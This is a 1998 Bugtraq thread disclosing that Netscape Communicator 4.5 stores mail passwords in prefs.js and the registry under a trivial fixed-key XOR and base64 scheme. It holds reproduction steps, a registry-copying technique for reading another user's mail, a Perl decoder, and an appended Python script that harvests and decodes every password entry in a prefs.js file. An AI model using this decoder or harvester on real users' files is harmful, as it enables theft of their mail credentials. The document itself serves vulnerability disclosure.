Date: Wed, 4 Nov 1998 18:29:55 +0100
From: Holger van Lengerich
To: BUGTRAQ@netspace.org
Subject: Communicator 4.5 stores EVERY mail-password in preferences.js

Hi!

Netscape Communicator 4.5 stores the encrypted version of used mail passwords (for IMAP and POP3) even if you tell Netscape to *not* "remember password" in the preferences dialog.

Damage:
=======

IMHO this means that anybody who can read your preferences.js ("prefs.js" in the MS dominion) is probably able to read your mail or even get your plaintext password.

How to reproduce:
=================

- start Communicator
- be sure "remember password" is disabled in the preferences dialog for the "Incoming Mail Server".
- get mail from the server (you get asked for your mail password)
- exit Communicator
- edit preferences.js in $HOME/.netscape (MS users: prefs.js in your NS profile path)
- search for something like:

--- 8< ---
user_pref("mail.imap.server.mail.password", "cRYpTPaSswD=");
user_pref("mail.imap.server.mail.remember_password", false);
--- >8 ---

- Now change "false" to "true".
- Save the file
- Start Communicator
- get mail ... now you are not asked for any password but can read all your mail! :(

Affected:
=========

probably all Communicator 4.5 packages on ALL operating systems. I was able to reproduce this behavior on:
- Sun Solaris
- Linux (glibc2)
- MS Windows NT.

Workaround:
===========

Don't use Communicator 4.5 to fetch mail from your IMAP/POP server, or be very sure that no one can read your Netscape preferences file!!!

Regards,
Holger van Lengerich, "pine" user :)

PS: The preferences.js is sent to Netscape on a Communicator crash, isn't it?

----------------------------------------------------------------------------
Holger van Lengerich - University of Paderborn - Dept. of Computer Science
System-Administration - Warburger Str.
100 - D 33098 Paderborn - Germany
mailto:gimli@uni-paderborn.de - http://www.uni-paderborn.de/admin/gimli
----------------------------------------------------------------------------

Date: Wed, 4 Nov 1998 17:20:27 -0600
From: HD Moore
To: BUGTRAQ@netspace.org
Subject: Re: Communicator 4.5 stores EVERY mail-password in preferences.js

In the Windows environment prefs.js isn't the only place that your password is stored. Netscape also creates a registry entry for your password (garbled as well) that any admin on your local LAN (or some cracker over the Internet) can read by remotely connecting to your registry. The path it is stored in is:

HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\biff\users\\servers\\password

This is with the 'don't save password' option checked on 4.5 (netscape.exe internal version: 4.50.2.19).

By any chance does anyone know how the password is encrypted or how strong the encryption is?

I also managed to copy that registry entry onto a separate computer (while Messenger was already open and I had checked my mail once), changed the hostname of the mail server entry to match and successfully retrieved mail with that account while sniffing the plaintext POP3 pass over my dialup...

---------------------------------------------------------------------------

Date: Sat, 7 Nov 1998 11:41:31 +0100
From: Holger van Lengerich
To: BUGTRAQ@netspace.org
Subject: NS-C4.5 & Mail-Passwords

Hi,

It turned out that only IMAP passwords are stored in the preferences.js after the Communicator process is correctly terminated. POP passwords are stored in preferences.js the first time you fetch mail from the server and cleared at Communicator exit. This happened using C4.5 on Sun Solaris. Some of you may reproduce this for other OSs and send me any feedback (NOT via bugtraq).

Even so, this is a security problem:
- Using a multiuser OS like Unix: an evil user may access the preferences file while you are working with Communicator.
- Files may be accessible via network shares.
- In a crash situation the password may not be cleared from the preferences.js.
- In this case the "Quality Feedback Agent" (QFA) may, if you allow it to do so, transfer the preferences.js (with encrypted password) via the Internet (readable at any host on the way to Netscape Corp.).

Be aware that the encryption of the password gives *NO* security. You don't need to know the decryption algorithm, because Communicator itself can do the decryption for you. By using a packet sniffer (like HD Moore) or setting up a patched IMAP/POP server with a password logging facility, you can easily get the plaintext passwords.

Regards,
Holger van Lengerich

----------------------------------------------------------------------------
Holger van Lengerich - University of Paderborn - Dept. of Computer Science
System-Administration - Warburger Str. 100 - D 33098 Paderborn - Germany
mailto:gimli@uni-paderborn.de - http://www.uni-paderborn.de/admin/gimli
----------------------------------------------------------------------------

Date: Fri, 6 Nov 1998 16:07:45 -0800
From: Thievco
To: BUGTRAQ@netspace.org
Subject: Re: Which crypto algorithm? was: Communicator 4.5 stores EVERY mail-password in preferences.js (decoder)

>Does anybody know the algorithm used to encrypt the passwords in
>Communicator??

Apparently, it takes the plaintext, XORs it with a fixed string, and base64-encodes the result:

    use MIME::Base64;
    # base64-decode the prefs.js value, then XOR it with the fixed string (first 7 bytes)
    print ((decode_base64('NLyIPunfKw==')) ^ ("\x56" . "\xc9" . "\xef" . "\x4a" . "\x9b" . "\xbe" . "\x5a"));

You need the MIME Perl module. This one is good up to 7 characters, because that's how long a couple of POP passwords I have are :)

Should be pretty straightforward to extend beyond 7 characters.. just take the encoded string from the prefs file, base64-decode it, and XOR it with your password in plaintext. What you'll get is the fixed string to XOR with.. just extend the bytes I have above.
The sequence of bytes is non-obvious as to the meaning (at least to me). It doesn't spell anything in ASCII.

Let me know if it doesn't work on your passwords.. I'm curious. I only had a couple to try.

BB
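The scheme Thievco describes (plaintext XOR a fixed byte string, then base64), worked through in Python as an added example that is not part of the original thread. It decodes the value posted above (it comes out as the string "bugtraq"), recovers the XOR string from one known password the way the message suggests for extending past 7 characters, and harvests every password pref from a prefs.js fragment of the form Holger quoted. The 7 key bytes and the ciphertext 'NLyIPunfKw==' are the ones posted; any key byte beyond position 7 is not on the page and is treated as unknown. The prefs.js sample, the second pref name and its longer value are constructed for the example.

```python
"""
Communicator 4.5 mail-password scrambling as described on Bugtraq:
    stored = base64( plaintext XOR fixed_string )
Added example; the fixed string is known only for its first 7 bytes.
"""
import base64
import re

# The 7 key bytes Thievco posted. Positions 8+ are unknown here.
KNOWN_KEY = bytes([0x56, 0xC9, 0xEF, 0x4A, 0x9B, 0xBE, 0x5A])

# Constructed prefs.js fragment. The first value is the one from the thread;
# the "other" server line is invented to show a value longer than the known key
# (its trailing bytes cannot be decoded with only 7 key bytes).
SAMPLE_PREFS_JS = '''
user_pref("mail.imap.server.mail.password", "NLyIPunfKw==");
user_pref("mail.imap.server.mail.remember_password", false);
user_pref("mail.imap.server.other.password", "NLyIPunfK7Qe");
'''


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR. The scheme uses no key stretching, so refuse to go past the known key."""
    if len(data) > len(key):
        raise ValueError(f"only {len(key)} key bytes known, value is {len(data)} bytes")
    return bytes(d ^ k for d, k in zip(data, key))


def decode_password(encoded: str, key: bytes = KNOWN_KEY) -> bytes:
    """prefs.js value -> plaintext: base64-decode, then XOR with the fixed string."""
    return xor_bytes(base64.b64decode(encoded), key)


def encode_password(plaintext: bytes, key: bytes = KNOWN_KEY) -> str:
    """Inverse of decode_password; confirms the scheme round-trips to the stored form."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode("ascii")


def recover_key(encoded: str, plaintext: bytes) -> bytes:
    """Known-plaintext key recovery: base64decode(stored) XOR password gives one
    key byte per password character. This is the extension step Thievco describes:
    a longer known password yields more of the fixed string."""
    raw = base64.b64decode(encoded)
    if len(raw) != len(plaintext):
        raise ValueError("stored value and known plaintext differ in length")
    return bytes(c ^ p for c, p in zip(raw, plaintext))


# Matches quoted-string prefs whose name ends in "password"; the boolean
# remember_password pref has an unquoted value and is therefore skipped.
PREF_RE = re.compile(r'user_pref\("([^"]*password)",\s*"([^"]*)"\);')


def harvest_passwords(prefs_js: str, key: bytes = KNOWN_KEY) -> dict:
    """Decode every non-empty password pref. Returns name -> (decoded prefix, truncated),
    where truncated is True when the value is longer than the known key."""
    found = {}
    for name, value in PREF_RE.findall(prefs_js):
        if not value:
            continue
        raw = base64.b64decode(value)
        n = min(len(raw), len(key))
        found[name] = (xor_bytes(raw[:n], key[:n]), len(raw) > len(key))
    return found


if __name__ == "__main__":
    print(decode_password("NLyIPunfKw=="))
    print(recover_key("NLyIPunfKw==", b"bugtraq").hex())
    for name, (pw, partial) in harvest_passwords(SAMPLE_PREFS_JS).items():
        print(name, pw, "(truncated)" if partial else "")
```

The point the thread makes still holds even without the key: the "encryption" is a fixed-key XOR, so one known password reveals as many key bytes as it has characters, and the Communicator itself will happily decrypt any harvested value for an attacker who runs it against a listening IMAP/POP server.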